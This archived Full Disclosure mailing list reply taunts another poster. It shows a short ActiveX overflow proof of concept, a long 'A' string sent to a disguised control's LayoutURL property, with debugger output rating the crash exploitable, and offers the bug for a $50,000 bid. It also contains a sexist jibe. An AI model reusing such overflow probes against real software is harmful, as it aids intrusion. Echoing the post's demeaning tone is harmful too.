Full Disclosure mailing list archives
Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
From: musnt live <musntlive () gmail com>
Date: Thu, 10 Jun 2010 12:39:20 -0400
On Thu, Jun 10, 2010 at 12:18 PM, Susan Bradley <sbradcpa () pacbell net>wrote:
Nope Mr. Live, other than dealing with .NET updates and a 982331 that keeps wanting to have UAC turned off on some Win7/Vistas to get installed, this is just my normal calm, try to also consider the consumers and patchers viewpoint person today. musnt live wrote:On Thu, Jun 10, 2010 at 11:36 AM, Susan Bradley <sbradcpa () pacbell net<mailto: sbradcpa () pacbell net>> wrote: I'm not an enterprise customer, but I am a mouthy female. Hello Full Disclosure, I'd like to warn you about PMS!
Hello Full Disclosure, please forgive for me my premature mail. What is I meant to now say is, I would like to warn you about Denial: http://en.wikipedia.org/wiki/Denial Denial is a defense mechanism postulated by Sigmund Freud, in which a person is faced with a fact that is too uncomfortable to accept and rejects it instead, insisting that it is not true despite what may be overwhelming evidence. I once had denial from vulnerable company I will release in the future: targetFile = "C:\NOFREEBUGNAMES.ocx" prototype = "Invoke_Unknown LayoutURL As String" memberName = "LayoutURL" progid = "no.free.bugs" argCount = 1 arg1=String(4116, "A") target.LayoutURL = arg1 0:000> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0xffffffffdeadbabe First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Read Access Violation Faulting Instruction:XXXXXXXX call dword ptr [ecx] Exception Hash (Major/Minor): 0x237f6e51.0x456c465d Stack Trace: nomore!CBaseBSCB::KickOffDownload+0x82 nomore!URLOpenStreamW+0x41 nomore!URLOpenStreamA+0x94 freebugs!DllUnregisterServer+0x5974 freebugs!BufferComparator::operator=+0x497a freebugs!msgi_lookup+0x46e61 freebugs!msgi_lookup+0x4f705 vbscript!IDispatchInvoke2+0xb2 vbscript!IDispatchInvoke+0x59 vbscript!InvokeDispatch+0x13c vbscript!InvokeByName+0x43 vbscript!CScriptRuntime::RunNoEH+0x1158 vbscript!CScriptRuntime::Run+0x64 vbscript!CScriptEntryPoint::Call+0x51 vbscript!CSession::Execute+0xc8 vbscript!COleScript::ExecutePendingScripts+0x146 vbscript!COleScript::SetScriptState+0x14d scrobj!ScriptEngine::Activate+0x1a scrobj!ComScriptlet::Inner::StartEngines+0x6e scrobj!ComScriptlet::Inner::Init+0x156 scrobj!ComScriptlet::New+0x3f scrobj!ComScriptletConstructor::CreateScriptletFromNode+0x26 scrobj!ComScriptletConstructor::Create+0x4c wscript!CHost::RunXMLScript+0x277 wscript!CHost::Execute+0x1cb wscript!CHost::Main+0x38b wscript!StringCchPrintfA+0xc3f wscript!WinMain+0x18b wscript!WinMainCRTStartup+0x5d kernel32!BaseThreadInitThunk+0xe ntdll!__RtlUserThreadStart+0x70 ntdll!_RtlUserThreadStart+0x1b Instruction Address: 0x00000000XXXXXXXX Description: Read Access Violation on Control Flow Short Description: ReadAVonControlFlow Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Read Access Violation on Control Flow starting at nomore!CBaseBSCB::KickOffDownload+0x0000000000000082 (Hash=0x237f6e51.0x456c465d) This bug too exploitable is as is my engrish. Starting bid affects all Windows versions and server remotely. Starting bid $50,000.00
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Tavis Ormandy (Jun 09)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Susan Bradley (Jun 10)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly musnt live (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Susan Bradley (Jun 10)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly musnt live (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly musnt live (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Tavis Ormandy (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Susan Bradley (Jun 10)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Tavis Ormandy (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Susan Bradley (Jun 10)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Christian Sciberras (Jun 10)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly musnt live (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Benjamin Franz (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Christian Sciberras (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly John Jacobs (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Benjamin Franz (Jun 11)
- Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly Susan Bradley (Jun 10)